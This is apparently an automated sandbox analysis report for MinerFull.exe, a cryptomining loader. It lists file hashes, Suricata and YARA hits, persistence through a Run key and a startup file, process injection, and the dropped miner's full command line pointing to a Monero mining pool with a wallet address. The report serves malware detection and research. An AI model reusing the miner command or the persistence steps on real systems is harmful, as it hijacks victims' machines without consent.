Analysis
-
max time kernel
151s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20220331-en -
submitted
11-04-2022 03:19
Static task
static1
Behavioral task
behavioral1
Sample
MinerFull.exe
Resource
win7-20220310-en
Behavioral task
behavioral2
Sample
MinerFull.exe
Resource
win10v2004-20220331-en
General
-
Target
MinerFull.exe
-
Size
4.0MB
-
MD5
5c7bc4cc56f6e6acb801210bc6eda798
-
SHA1
541b6f50091fdc17c2bc8d596c0e202b854fb991
-
SHA256
48f66e13c00038bb2ec12a58bd34cb79f2cf616230c25224c68b81d6c3d7ebf9
-
SHA512
66558bf8679c264c507a1fb8da2fd81347b339d3786487895f902330d63bf9b44be5a136061b0848801b768fea3e525b934d1b04c2cef959cc878b421c6cbd5d
Malware Config
Signatures
-
suricata: ET MALWARE CerberTear Ransomware CnC Checkin
suricata: ET MALWARE CerberTear Ransomware CnC Checkin
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/3304-124-0x0000000000270000-0x0000000000670000-memory.dmp loaderbot -
Executes dropped EXE 2 IoCs
pid Process 4804 Driver.exe 204 Driver.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\Control Panel\International\Geo\Nation MinerFull.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url MinerFull.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\MinerFull.exe" MinerFull.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 4788 4804 WerFault.exe 83 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe 3304 MinerFull.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 640 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3304 MinerFull.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3304 MinerFull.exe Token: SeLockMemoryPrivilege 4804 Driver.exe Token: SeLockMemoryPrivilege 4804 Driver.exe Token: SeLockMemoryPrivilege 204 Driver.exe Token: SeLockMemoryPrivilege 204 Driver.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3304 wrote to memory of 4804 3304 MinerFull.exe 83 PID 3304 wrote to memory of 4804 3304 MinerFull.exe 83 PID 3304 wrote to memory of 204 3304 MinerFull.exe 88 PID 3304 wrote to memory of 204 3304 MinerFull.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\MinerFull.exe"C:\Users\Admin\AppData\Local\Temp\MinerFull.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH -p x -k -v=0 --donate-level=1 -t 12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4804 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4804 -s 7643⤵
- Program crash
PID:4788
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH -p x -k -v=0 --donate-level=1 -t 12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:204
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 4804 -ip 48041⤵PID:4748
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322